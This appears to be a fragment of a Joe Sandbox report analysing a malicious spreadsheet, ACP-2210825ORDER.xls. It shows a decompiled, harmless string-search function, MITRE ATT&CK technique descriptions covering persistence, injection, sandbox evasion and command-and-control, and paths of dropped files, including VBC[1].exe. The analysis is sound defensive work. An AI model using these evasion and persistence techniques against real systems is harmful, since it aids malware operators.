Uniqueness

Uniqueness Score: -1.00%

Function 00405D4C Relevance: 5.0, APIs: 4, Instructions: 37
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405D4C(void* __ecx, CHAR* _a4, CHAR* _a8) {
				int _v8;
				int _t12;
				int _t14;
				int _t15;
				CHAR* _t17;
				CHAR* _t27;

				_t12 = lstrlenA(_a8);
				_t27 = _a4;
				_v8 = _t12;
				while(lstrlenA(_t27) >= _v8) {
					_t14 = _v8;
					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
					_t15 = lstrcmpiA(_t27, _a8);
					_t27[_v8] =  *(_t14 + _t27);
					if(_t15 == 0) {
						_t17 = _t27;
					} else {
						_t27 = CharNextA(_t27);
						continue;
					}
					L5:
					return _t17;
				}
				_t17 = 0;
				goto L5;
			}

0x00405d5c
0x00405d5e
0x00405d61
0x00405d8d
0x00405d66
0x00405d6f
0x00405d74
0x00405d7f
0x00405d82
0x00405d9e
0x00405d84
0x00405d8b
0x00000000
0x00405d8b
0x00405d97
0x00405d9b
0x00405d9b
0x00405d95
0x00000000

APIs

lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,0040602D,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D5C
lstrcmpiA.KERNEL32(00000000,00000000,?,00000000,0040602D,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D74
CharNextA.USER32(00000000), ref: 00405D85
lstrlenA.KERNEL32(00000000,?,00000000,0040602D,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D8E

Memory Dump Source

Source File: 00000005.00000002.1185274086.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1185243112.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185313446.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185344377.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185477830.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185484437.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185490034.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185495870.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185506115.000000000046C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185511904.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_vbc.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: d13a305aa79855a3845d1893bd1e44018cb4e3b8a4cc5142433a7699c001be6c
Instruction ID: 1f72a7e7db10584d46f5d47bab472a29a69204e410489cb336b3e0253d2e012c
Opcode Fuzzy Hash: d13a305aa79855a3845d1893bd1e44018cb4e3b8a4cc5142433a7699c001be6c
Instruction Fuzzy Hash: 31F09631104918FFC712DFA5DD0499FBBA8EF06350B2580BAE841F7251D674DE019F99

Uniqueness

Uniqueness Score: -1.00%

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer.Shutting down or rebooting systems may disrupt access to computer resources for legitimate users.
Tactics:	Impact
Data Sources:	Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report ACP-2210825ORDER.xls

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Memory Dumps

Sigma Signatures

Exploits

Snort Signatures

Joe Sandbox Signatures

AV Detection

Exploits

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\VBC[1].exe

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1F090A1F.emf

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2A84DD94.emf

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2C485423.emf

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\489D37C8.emf

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4A546E2A.emf

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\628281DB.emf

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\95D0DCC2.emf

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9BAF1916.emf

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\BC7C3885.emf

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C6BD8529.emf

C:\Users\user\AppData\Local\Temp\nsp5B93.tmp\System.dll

C:\Users\user\AppData\Local\Temp\~DF15E3E53C3844A1B8.TMP

C:\Users\user\AppData\Local\Temp\~DF357B58C09F937A89.TMP

C:\Users\user\AppData\Local\Temp\~DF688530565CAD41F4.TMP

C:\Users\user\AppData\Local\Temp\~DFEB3257B002629434.TMP

Windows Analysis Report
ACP-2210825ORDER.xls